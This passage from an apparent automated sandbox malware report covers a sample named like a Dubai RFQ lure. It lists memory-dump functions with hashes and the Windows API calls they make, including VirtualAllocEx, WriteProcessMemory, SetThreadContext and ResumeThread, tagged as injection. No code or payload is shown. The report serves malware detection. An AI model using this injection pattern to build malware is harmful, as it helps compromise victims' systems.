Opcode ID: 4a139bdaf816d18bd0bd1250afd1aa888001d279baac0289ecdb0ea5df6f8fe7
Instruction ID: 779a6878b62dd6907d0b7258505a7af4d46239a4dc052279988180e26f8b3ead
Opcode Fuzzy Hash: 4a139bdaf816d18bd0bd1250afd1aa888001d279baac0289ecdb0ea5df6f8fe7
Instruction Fuzzy Hash: EEC17B30E002188FDB55CF69C88079DBBB2AF85310F14C1AAD459EB255DB74E985CFA2

Function 06D378A8 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d65f42b55bba2803585d5d4a0b5c6f129092a5d296776ce53f4528da80ae3b01
Instruction ID: f67c7d8839400aced96970f60aafdb83f50552ede0bba5d2b7c1497590ad4e88
Opcode Fuzzy Hash: d65f42b55bba2803585d5d4a0b5c6f129092a5d296776ce53f4528da80ae3b01
Instruction Fuzzy Hash: D27105B1D04629CFEB64CF66C8407EDBBB6BB89300F1091AAD44DA6254EB709A85CF50

Function 06D37EBC Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00483a2dd212cd829b3e67cbc061577f8b62897a8ac8a69b51deaf6b90737109
Instruction ID: 12932f473bc703bbde3180c4dff6173817ab2957c34c90d45284d1fdc3ec7826
Opcode Fuzzy Hash: 00483a2dd212cd829b3e67cbc061577f8b62897a8ac8a69b51deaf6b90737109
Instruction Fuzzy Hash: 2A610179D09228CFDBA4CF64D944BECBBB5BB4A311F1090EAD44EA7251CB309A85DF50

Function 06D38033 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d34f9c0c11b0af301f2c48f4f60f4256b62f2d31d7381b013e0f7344fa180be
Instruction ID: 275f2280c066592883a3e96510738f16c65987559624555a808df5620706547b
Opcode Fuzzy Hash: 2d34f9c0c11b0af301f2c48f4f60f4256b62f2d31d7381b013e0f7344fa180be
Instruction Fuzzy Hash: 1E610378D09228CFEBA4DF64D844BECBBB5BB4A311F1090EAD44DA7251CB309A85CF54

Function 06D37FEC Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 109ba6d524675c5fb157dcaecaad963ca2e528c96473015a01f72b9745a5982b
Instruction ID: 2de4466b0b84c5fa037a36666186143e7e01787e5c4bc838c01bf1d5150336eb
Opcode Fuzzy Hash: 109ba6d524675c5fb157dcaecaad963ca2e528c96473015a01f72b9745a5982b
Instruction Fuzzy Hash: D361F178D09228CFEBA4CF64D844BECBBB5BB4A311F1091EAD44DA7251CB349A85DF44

Function 068DED40 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108770947837.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdeecbf7221c2cbb0cb6c5af95759b73236c1fbf0f78909d78f50eb90bb7f612
Instruction ID: 2e57d39670cade538ac0b8599fd86e91e0469784458d1983c8aac334ae8e7144
Opcode Fuzzy Hash: fdeecbf7221c2cbb0cb6c5af95759b73236c1fbf0f78909d78f50eb90bb7f612
Instruction Fuzzy Hash: 4B2191B1C097489BEB59CF6B9C0569EFFB7AFC6200F08C0AAD508EA165DA340945CF61

Function 06D36715 Relevance: 1.8, APIs: 1, Instructions: 252
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D36956

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0bfcfa623d6331e74b5d522c3312b1cd2c0ba926cf5ab417ff89ec91e684fcf8
Instruction ID: 75cb4a1cd2d12a7a1cc2658d72fddd076127f873038933d8614df14a9c5c2eb2
Opcode Fuzzy Hash: 0bfcfa623d6331e74b5d522c3312b1cd2c0ba926cf5ab417ff89ec91e684fcf8
Instruction Fuzzy Hash: 3CA16D71D002699FEB50CFA8C845BEEBBB2FF48314F1485A9E849A7280D774D985CF91

Function 06D36720 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D36956

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: bea441549e7b15732c2a9df980f2d9c7cae306db4232ae7466a9b8a2ddc4030a
Instruction ID: 7189da55d2932db41a46ab6f8d7117454522779c11e11ddc9b4d92060ca0155c
Opcode Fuzzy Hash: bea441549e7b15732c2a9df980f2d9c7cae306db4232ae7466a9b8a2ddc4030a
Instruction Fuzzy Hash: 8C915D71D002699FEB50CFA8C844BEDBBB2FF49314F1485A9E849A7280D774D985CF91

Function 04AF7D20 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 04AF96D9

Memory Dump Source

Source File: 00000000.00000002.108767762514.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4af0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 4824e89d1baa503c9cdff4af4966d87d6ce11b93bf1bbe3c7fa1aafa1434eec8
Instruction ID: bf0cb878bed999af619d5463f6a24dbef263979b2517c1fce67151a2e47c3cb9
Opcode Fuzzy Hash: 4824e89d1baa503c9cdff4af4966d87d6ce11b93bf1bbe3c7fa1aafa1434eec8
Instruction Fuzzy Hash: 4141B3B1C04719CBEB24CFA9C84479EBBF5FF48304F208169D508AB255DB756945CF90

Function 068D39E8 Relevance: 1.6, APIs: 1, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.108770947837.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 849c0462c574174587c100df6cae3cac2922d82364c02390d048ebc6f150ba82
Instruction ID: 7bb9de72cfdae944336c5882e55e28d1c70decb4b4dca3ddd59f05f28cb65476
Opcode Fuzzy Hash: 849c0462c574174587c100df6cae3cac2922d82364c02390d048ebc6f150ba82
Instruction Fuzzy Hash: 08318D71900388AFCB11CFA9D840AEEBFF8EF49350F14846AE954A7251C375D954DFA1

Function 06D36490 Relevance: 1.6, APIs: 1, Instructions: 76
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D36528

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b82184b8308637f98d4b02ba2fb2c0aecccce46bbb43ea827db8992b1543e94e
Instruction ID: bb7b9b5a796b98fc21bcfa276570a75a86abc4f1b9b6b7b264b956a2f464d577
Opcode Fuzzy Hash: b82184b8308637f98d4b02ba2fb2c0aecccce46bbb43ea827db8992b1543e94e
Instruction Fuzzy Hash: D3217EB5C003499FCB00CFA9C984BEEBBF5FF48314F10882AE914A7240C774A544CBA4

Function 06D35EC0 Relevance: 1.6, APIs: 1, Instructions: 71
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D35F46

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a73df44f04ee23dc354123a35d6ef9e7d6ec84b2ab671fbff9d407913e094f49
Instruction ID: d3f294cf2f7a31531db5305c0d6590a0885e90b11b5c9bfb5e1b50f81d373da1
Opcode Fuzzy Hash: a73df44f04ee23dc354123a35d6ef9e7d6ec84b2ab671fbff9d407913e094f49
Instruction Fuzzy Hash: 56212AB1D003499FDB10DFAAC8847EFBBF5EF48214F14842AD559A7280D778A944CBA4

Function 06D36580 Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D36608

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4b0044301a17239920985d528fe7688ab086ea31f8a583f223ac273a9094e875
Instruction ID: 7624776b18a43f4b1abeea337cff30596ccba0b17bfdd44492e5cc818b7e4d05
Opcode Fuzzy Hash: 4b0044301a17239920985d528fe7688ab086ea31f8a583f223ac273a9094e875
Instruction Fuzzy Hash: F2214AB1C003499FDB00DFAAC884BEEBBF5FF48314F10882AE559A7240C774A545CBA4

Function 06D36498 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D36528

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4497e0eb04041b282e1424cda3e58c5705df03b1a1ff6ca9075f4c75abd07dbc
Instruction ID: 92d23c43869c7de74803355c9497c75bf466f67d7919e030491576240661c69e
Opcode Fuzzy Hash: 4497e0eb04041b282e1424cda3e58c5705df03b1a1ff6ca9075f4c75abd07dbc
Instruction Fuzzy Hash: 03212AB1D003599FDB00CFA9C9847EEBBF5FF48314F10882AE919A7241D778A954CB64

Function 06D35EC8 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D35F46

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 60da5fa0ce2e8c2cef80483156324dea86acecb3ce02f81e6b54c54860166117
Instruction ID: 2c2ee24e21725c3dc117bdf2a85014013fa48f3b631f1c7b29aefedf7e6f682a
Opcode Fuzzy Hash: 60da5fa0ce2e8c2cef80483156324dea86acecb3ce02f81e6b54c54860166117
Instruction Fuzzy Hash: 132118B1D003498FDB10DFAAC5847EEBBF5EF48314F14842AD559A7280D778A945CFA4

Function 06D36588 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D36608

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 46e7bb8e11b05ae0a2d8a733757a3250da78ab784e88ed98403cd6db1c4c2511
Instruction ID: 65a4767199cfdab430e07cfba65a981ee7041bcbc8718bb7480b6ca9b683e1e0
Opcode Fuzzy Hash: 46e7bb8e11b05ae0a2d8a733757a3250da78ab784e88ed98403cd6db1c4c2511
Instruction Fuzzy Hash: A02128B1C003599FDB00DFAAC9847EEBBF5FF48314F50882AD519A7240D778A945DBA4

Function 06D363D0 Relevance: 1.6, APIs: 1, Instructions: 60
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D36446

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bb88c3e819654f27b88071b48ec0c9cf8e6701253a0657acfc8625b0c9ec0313
Instruction ID: cb74469e333843c3a721aa8fdfa5c4ea5a9f91c3c64a9d7b1c15ae0ead0b1773
Opcode Fuzzy Hash: bb88c3e819654f27b88071b48ec0c9cf8e6701253a0657acfc8625b0c9ec0313
Instruction Fuzzy Hash: 451147B1800389AFDB10DFAAC844BEFBFF9EF48314F14881AE515A7240C775A544CBA5

Function 04AFC984 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 04AFCD46

Memory Dump Source

Source File: 00000000.00000002.108767762514.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4af0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: a49d444508c39cda7da634e4e2eba174a366dfcfdd3c6815b38f64301f4e8a11
Instruction ID: e1eb33bd938a21823ccdc0667ae18e433e0a3abf939b2a70b10bc3d5c9002be6
Opcode Fuzzy Hash: a49d444508c39cda7da634e4e2eba174a366dfcfdd3c6815b38f64301f4e8a11
Instruction Fuzzy Hash: 28210FB68002099FDB10CF9AC884ADEFBB4FB49324F14892EE519B7600D374A944CBA0

Function 068D0F7C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,068D3A02,?,?,?,?,?), ref: 068D3AA7

Memory Dump Source

Source File: 00000000.00000002.108770947837.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 25f8f4abc5f4fea4aa693cd1548b28a3bda0de1fd756fa10515a3cf3cd4faf86
Instruction ID: c882e11873a744957bb753be5d4fc8c29850ed5e4e8228194e758fe7553525dd
Opcode Fuzzy Hash: 25f8f4abc5f4fea4aa693cd1548b28a3bda0de1fd756fa10515a3cf3cd4faf86
Instruction Fuzzy Hash: A21129B59002899FDB10CFAAC844BEEBFF8EB48314F14841AE915A7250C375E954DFA5

Function 06D35E11 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06D35E7A

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f46c6763683881842522a4f8444477eb9df844e38ccd76d136943a7a397ab9f3
Instruction ID: 3137638e81719c97c9f43156dd2b923dde90b350c92323cdbbaf4b7cf0e14c1c
Opcode Fuzzy Hash: f46c6763683881842522a4f8444477eb9df844e38ccd76d136943a7a397ab9f3
Instruction Fuzzy Hash: CF1119B1D003598BDB10DFAAD8847EFBBF9EB48214F14881AD559A7240C778A945CBA4

Function 06D363D8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D36446

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1fe916c6dd2e092608d74eeffba822b9355f2ebd4b12c8d561724a421e2ffb6e
Instruction ID: 45e167a71d0e35a931d4c874dd62a89e38db9601bf4802e3af99a045b53ebd09
Opcode Fuzzy Hash: 1fe916c6dd2e092608d74eeffba822b9355f2ebd4b12c8d561724a421e2ffb6e
Instruction Fuzzy Hash: 6B1126B18003899FDB10DFAAC8447EEBBF5EB48314F14881AD515A7240C775A944CBA4

Function 06D35E18 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06D35E7A

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 94ffd3e951c10eea8fd2d34a9f3cf0a0fb27afe0cfff553c7265a7d2ef2f7f07
Instruction ID: 30548abc3fd5a0a828b90dd63a8f564546b814960d004dc84f02d9db4bca4ae1
Opcode Fuzzy Hash: 94ffd3e951c10eea8fd2d34a9f3cf0a0fb27afe0cfff553c7265a7d2ef2f7f07
Instruction Fuzzy Hash: 3A113DB1D003498BDB10DFAAD8447EEFBF5EB48214F14881AC519A7340C774A944CB94

Function 04AFE338 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 04AFE39E

Memory Dump Source

Source File: 00000000.00000002.108767762514.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4af0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d2f80cea43c84ae5a7f899909e315e21aab0cb60a81fefd1b6838dde681c025e
Instruction ID: d4c55f79be02f16054ecd48c0fbfa1835ae360336ff7f8f4e58ac436d0b195d3
Opcode Fuzzy Hash: d2f80cea43c84ae5a7f899909e315e21aab0cb60a81fefd1b6838dde681c025e
Instruction Fuzzy Hash: 171113B5C002498FDB10CF9AC844BDFFBF5EB88314F14852AD919A7650C374A545CFA1

Function 06D38A05 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06D38A65

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 1ce502705f7eb22806adfbb5ba9ca60a0124fcf6b18f12feb9e955abfcc53874
Instruction ID: 052eee2609e54b7df7d14015fdd711fec2ab447d3e80f2d166d7f5026c3188a2
Opcode Fuzzy Hash: 1ce502705f7eb22806adfbb5ba9ca60a0124fcf6b18f12feb9e955abfcc53874
Instruction Fuzzy Hash: 791103B58003499FDB10DF9AC884BDEFFF8EB48314F24881AE518A7640C374A944CFA1

Function 06D34800 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06D38A65

Memory Dump Source

Source File: 00000000.00000002.108771586925.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d30000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7ca9a43da1b974f9ef03af78273507a3c6e3ddf0c75d413b42034ecda623e66c
Instruction ID: 344490c7e33268e55ebd4f6bd84841c30e9551b4c8bd2942e0b066f7fcf751df
Opcode Fuzzy Hash: 7ca9a43da1b974f9ef03af78273507a3c6e3ddf0c75d413b42034ecda623e66c
Instruction Fuzzy Hash: 941106B58003499FDB10DF9AC984BDEBFF8EB48314F10881AE559A7640C375A944CFA1

Function 068D1920 Relevance: 1.3, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,068D17D9,?,?), ref: 068D1980

Memory Dump Source

Source File: 00000000.00000002.108770947837.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 79dbf40fe766f762066e3f6a78a283a58804c4826b90e69477a64cf112c1bd49
Instruction ID: 12ce95752de089dd1963f7f12229405c399ee30a40a7ff311a3a22ed49d89abb
Opcode Fuzzy Hash: 79dbf40fe766f762066e3f6a78a283a58804c4826b90e69477a64cf112c1bd49
Instruction Fuzzy Hash: 57113AB58003499FCB10DF9AD5887DEFBF4EF48324F24842AD558A7640C778A544CFA5

Function 068D0EDC Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,068D17D9,?,?), ref: 068D1980

Memory Dump Source

Source File: 00000000.00000002.108770947837.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c5e7b81a8bc4c280c104644fe7b3b5a56e8ca8488c7ad938676e949c63518404
Instruction ID: 8899e3283f83deb8f98c2fc355e01978b6b288235874c662a0d652c8b42d7d2c
Opcode Fuzzy Hash: c5e7b81a8bc4c280c104644fe7b3b5a56e8ca8488c7ad938676e949c63518404
Instruction Fuzzy Hash: 5D1128B58003499FDB50DF9AC4487EEFBF4EF48324F24841AD959A7640D378A944CFA5

Function 068D0EF8 Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,068D17D9,?,?), ref: 068D1980

Memory Dump Source

Source File: 00000000.00000002.108770947837.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 191e91d1021beadd42b8af36e488a7672ab782cb9de92e5e2f44a99c00b13600
Instruction ID: 24fdda57b00fc28599629b91fcfb24e9094c9b06f1b6ac1ab7efe03141589f07
Opcode Fuzzy Hash: 191e91d1021beadd42b8af36e488a7672ab782cb9de92e5e2f44a99c00b13600
Instruction Fuzzy Hash: 5B1158B18003499FDB10DF9AC4487EEFBF4EF48324F20841AD559A7240C338A944CFA4

Function 068D0E74 Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,068D17D9,?,?), ref: 068D1980

Memory Dump Source

Source File: 00000000.00000002.108770947837.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 50df1ceec5250dd17758334093a1c1f4c9653bed0950154216092bcb083ba6b3
Instruction ID: 1f9f5bd55879b8d037b78cdfadbe2f8479693e4edc1b8697e719ad923f26f204
Opcode Fuzzy Hash: 50df1ceec5250dd17758334093a1c1f4c9653bed0950154216092bcb083ba6b3
Instruction Fuzzy Hash: B51128B58003499FDB50DF9AC5487EEFBF4EF48324F14882AD559A7240D378A944CFA5

Function 00BFD1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108765122481.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bfd000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9a73726f6c3a8e47d572dadabbae35d2ed9267cdb46564afb221cfd64265e7f
Instruction ID: 0de21d8b16c27e7acac0d7e8e52e4bef550dd1f32e6021da67602820037c2233
Opcode Fuzzy Hash: c9a73726f6c3a8e47d572dadabbae35d2ed9267cdb46564afb221cfd64265e7f
Instruction Fuzzy Hash: F421D672504344DFDB05DF54D9C0B2ABBA6FB88314F24C5A9E9050B246C336D81ADBA2

Function 00C0D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108765187630.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0d000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5430a1799969f498160fe17578f8fec0515b2a4071b4d47a6c8470dd8910a03a
Instruction ID: cebf8b1e5f9c7e2d53688e44bd30ba6e66802b3179ef4e27bd0543f9d6f16e7e
Opcode Fuzzy Hash: 5430a1799969f498160fe17578f8fec0515b2a4071b4d47a6c8470dd8910a03a
Instruction Fuzzy Hash: 4921D475504340EFDB05DF94D9C0B26BBA5FB84314F24C5ADE84A4B2C6C736DC56CA62

Function 00C0D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.108765187630.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0d000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
